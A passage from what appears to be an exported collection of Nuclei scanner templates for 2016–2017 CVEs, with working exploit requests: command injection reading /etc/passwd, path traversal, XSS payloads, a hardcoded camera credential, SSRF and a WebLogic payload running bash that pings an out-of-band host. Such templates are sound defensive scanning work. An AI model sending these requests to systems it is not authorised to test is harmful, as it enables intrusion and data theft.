http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/\n - https://www.kb.cert.org/vuls/id/582384\n - http://kb.netgear.com/000036386/CVE-2016-582384\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-6277\n cwe-id: CWE-352\n epss-score: 0.97471\n epss-percentile: 0.99962\n cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: d6220_firmware\n tags: cve2016,cve,netgear,rce,iot,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220486802970cc24d96538b869531c7a01ec169cb576278c3edad08fb0b3171abc802206eba1c836af2a9bbfbf9b2fc2efec581afdaeb05159f11aa43a1a80f99cc78df:922c64590222798bb761d5b6d8e72950", "hash": "f55729fbc4a3f5b0ee84b5dbc71e6342", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa3" }, "name": "CVE-2016-6601.yaml", "content": "id: CVE-2016-6601\n\ninfo:\n name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable to local file inclusion, which allows an attacker to read arbitrary files via a .. 
(dot dot) in the fileName parameter to servlets/FetchFile.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.\n remediation: |\n Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.\n reference:\n - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt\n - https://www.exploit-db.com/exploits/40229/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-6601\n - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure\n - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-6601\n cwe-id: CWE-22\n epss-score: 0.97503\n epss-percentile: 0.99977\n cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: webnms_framework\n tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950", "hash": "d347ee500c62435873c5f4aa4008b42a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa4" }, "name": "CVE-2016-7552.yaml", "content": "id: CVE-2016-7552\n\ninfo:\n name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass\n author: dwisiswant0\n severity: critical\n description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which 
allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance.\n remediation: |\n Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.\n reference:\n - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7552\n - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-7552\n cwe-id: CWE-22\n epss-score: 0.96711\n epss-percentile: 0.99632\n cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: trendmicro\n product: threat_discovery_appliance\n tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/logoff.cgi\"\n\n headers:\n Cookie: \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Memory map\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950", "hash": "4aef0aaaffa2f633cf1652062320925c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa5" }, "name": "CVE-2016-7834.yaml", "content": "id: CVE-2016-7834\n\ninfo:\n name: Sony IPELA Engine IP Camera - Hardcoded Account\n author: af001\n severity: high\n description: |\n Multiple SONY network cameras 
are vulnerable to sensitive information disclosure via hardcoded credentials.\n impact: |\n An attacker can gain unauthorized access to the camera and potentially control its functions.\n remediation: |\n Upgrade to the latest version of the firmware provided by Sony.\n reference:\n - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/\n - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/\n - https://jvn.jp/en/vu/JVNVU96435227/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7834\n - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras\n classification:\n cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-7834\n cwe-id: CWE-200\n epss-score: 0.00186\n epss-percentile: 0.55032\n cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sony\n product: snc_series_firmware\n tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/command/prima-factory.cgi\"\n\n headers:\n Authorization: Bearer cHJpbWFuYTpwcmltYW5h\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'gen5th'\n - 'gen6th'\n condition: or\n\n - type: status\n status:\n - 204\n# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950", "hash": "96bb35bf22fa646dbe75a68b7a4f47f7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa6" }, "name": "CVE-2016-7981.yaml", "content": "id: CVE-2016-7981\n\ninfo:\n name: SPIP <3.1.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web 
script or HTML via the var_url parameter in a valider_xml action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser.\n remediation: |\n Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability.\n reference:\n - https://core.spip.net/projects/spip/repository/revisions/23202\n - https://core.spip.net/projects/spip/repository/revisions/23201\n - https://core.spip.net/projects/spip/repository/revisions/23200\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7981\n - http://www.openwall.com/lists/oss-security/2016/10/05/17\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-7981\n cwe-id: CWE-79\n epss-score: 0.00258\n epss-percentile: 0.63488\n cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: spip\n product: spip\n tags: cve2016,cve,xss,spip\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950", "hash": "9a95450856d9e31a37894187179d4f29", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa7" }, "name": "CVE-2016-8527.yaml", "content": "id: CVE-2016-8527\n\ninfo:\n name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute 
arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/41482\n - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt\n - https://www.exploit-db.com/exploits/41482/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-8527\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-8527\n cwe-id: CWE-79\n epss-score: 0.00166\n epss-percentile: 0.53225\n cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: airwave\n tags: cve2016,cve,aruba,xss,edb,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950", "hash": "ec74fef44a8b363dbcd0f40c3d1eeafd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa8" }, "name": "CVE-2017-0929.yaml", "content": "id: CVE-2017-0929\n\ninfo:\n name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery\n author: charanrayudu,meme-lord\n severity: high\n description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. 
Attackers may be able to access information about internal network resources.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above.\n reference:\n - https://hackerone.com/reports/482634\n - https://nvd.nist.gov/vuln/detail/CVE-2017-0929\n - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-0929\n cwe-id: CWE-918\n epss-score: 0.00753\n epss-percentile: 0.80628\n cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dnnsoftware\n product: dotnetnuke\n tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950", "hash": "0ceb67263ec7abd036e80ae6fc777cf7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa9" }, "name": "CVE-2017-1000028.yaml", "content": "id: CVE-2017-1000028\n\ninfo:\n name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion\n author: pikpikcu,daffainfo\n severity: high\n description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially 
crafted HTTP GET requests.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.\n reference:\n - https://www.exploit-db.com/exploits/45196\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n - https://www.exploit-db.com/exploits/45196/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000028\n cwe-id: CWE-22\n epss-score: 0.97516\n epss-percentile: 0.99984\n cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: glassfish_server\n tags: cve,cve2017,oracle,glassfish,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\"\n - \"{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950", "hash": "d515e259ba8ba777c8bce30f963e98f3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307faa" }, "name": "CVE-2017-1000029.yaml", "content": "id: 
CVE-2017-1000029\n\ninfo:\n name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000029\n cwe-id: CWE-200\n epss-score: 0.00387\n epss-percentile: 0.70348\n cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: glassfish_server\n tags: cve,cve2017,glassfish,oracle,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resource/file%3a///etc/passwd/\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950", "hash": "0597ddb09233bdd84376aeff6d184d3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fab" }, "name": "CVE-2017-1000163.yaml", "content": "id: CVE-2017-1000163\n\ninfo:\n name: Phoenix Framework - Open Redirect\n author: 0x_Akoko\n 
severity: medium\n description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of the Phoenix Framework.\n reference:\n - https://elixirforum.com/t/security-releases-for-phoenix/4143\n - https://vuldb.com/?id.109587\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000163\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-1000163\n cwe-id: CWE-601\n epss-score: 0.00186\n epss-percentile: 0.55009\n cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phoenixframework\n product: phoenix\n tags: cve,cve2017,redirect,phoenix,phoenixframework\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?redirect=/\\interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4a0a00473045022066d0d9509969142bbfbcf0eb417da56845541044c0685547d194ebb62e0364e0022100eaeac8289ca457b4603e6babedbbca92bed9163d0b07be773a03a4e1c82b5b82:922c64590222798bb761d5b6d8e72950", "hash": "96eb7045c30228a6c097f15f1ba2ea32", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fac" }, "name": "CVE-2017-1000170.yaml", "content": "id: CVE-2017-1000170\n\ninfo:\n name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion\n author: dwisiswant0\n severity: high\n description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via 
jqueryFileTree.\n impact: |\n Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.\n remediation: |\n Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/49693\n - https://github.com/jqueryfiletree/jqueryfiletree/issues/66\n - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000170\n cwe-id: CWE-22\n epss-score: 0.70305\n epss-percentile: 0.97752\n cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jqueryfiletree_project\n product: jqueryfiletree\n tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php\"\n\n body: \"dir=%2Fetc%2F&onlyFiles=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"
  • \"\n - \"passwd
  • \"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b9e346f4bc199c5c0d4019c3d55480f4c69a0aa58566ef0af6b1d5097ab3260102204c81a7d73a9c46c562c114589710b19afcd82876e0c9bfce5698a075d42880cf:922c64590222798bb761d5b6d8e72950", "hash": "99b504213aa15aee4ad2fc6f95125d3a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fad" }, "name": "CVE-2017-1000486.yaml", "content": "id: CVE-2017-1000486\n\ninfo:\n name: Primetek Primefaces 5.x - Remote Code Execution\n author: Moritz Nentwig\n severity: critical\n description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.\n reference:\n - https://github.com/mogwailabs/CVE-2017-1000486\n - https://github.com/pimps/CVE-2017-1000486\n - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486\n - https://cryptosense.com/weak-encryption-flaw-in-primefaces/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-1000486\n cwe-id: CWE-326\n epss-score: 0.97013\n epss-percentile: 0.99726\n cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: primetek\n product: primefaces\n tags: cve2017,cve,primetek,rce,injection,kev\n\nhttp:\n - raw:\n - |\n POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n\n 
matchers:\n - type: word\n part: header\n words:\n - 'Mogwailabs: CHECKCHECK'\n# digest: 4b0a004830460221008705283db1e276d968dd9b9bb0133072312deb7b46962195ff0237cbdbe58371022100cb9b42c506991d9e6bdc752569564cf00e79eba7dd83b19d99be99ee26ac19d3:922c64590222798bb761d5b6d8e72950", "hash": "3f8a02b254e9e51afb34e4a7fb15231c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fae" }, "name": "CVE-2017-10075.yaml", "content": "id: CVE-2017-10075\n\ninfo:\n name: Oracle Content Server - Cross-Site Scripting\n author: madrobot\n severity: high\n description: |\n Oracle Content Server versions 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches provided by Oracle to fix this vulnerability.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\n - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10075\n - http://www.securitytracker.com/id/1038940\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n cvss-score: 8.2\n cve-id: CVE-2017-10075\n epss-score: 0.00451\n epss-percentile: 0.72424\n cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: oracle\n product: webcenter_content\n google-query: inurl:\"/cs/idcplg\"\n tags: cve,cve2017,xss,oracle\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO\"\n - \"{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"ORACLE_QUERY\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950", "hash": "97a188d867f2714a5b24e4bdd2076f27", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307faf" }, "name": "CVE-2017-10271.yaml", "content": "id: CVE-2017-10271\n\ninfo:\n name: Oracle WebLogic Server - Remote Command Execution\n author: dr_set,ImNightmaree,true13\n severity: high\n description: |\n The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. 
This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.\n remediation: |\n Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms.\n reference:\n - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271\n - https://github.com/SuperHacker-liuan/cve-2017-10271-poc\n - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10271\n - http://www.securitytracker.com/id/1039608\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2017-10271\n epss-score: 0.97426\n epss-percentile: 0.99932\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: weblogic_server\n tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle\n\nhttp:\n - raw:\n - |\n POST /wls-wsat/CoordinatorPortType HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n \n /bin/bash\n \n \n -c\n \n \n ping -c 1 {{interactsh-url}}\n \n \n \n \n \n \n \n \n - |\n POST /wls-wsat/CoordinatorPortType HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n \n \n \n \n {{randstr}}\n \n \n \n \n \n \n \n \n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - regex(\"java.lang.ProcessBuilder || 0\", body)\n - contains(interactsh_protocol, \"dns\")\n - status_code == 500\n condition: and\n\n - type: dsl\n dsl:\n - body == \"{{randstr}}\"\n - status_code == 200\n 
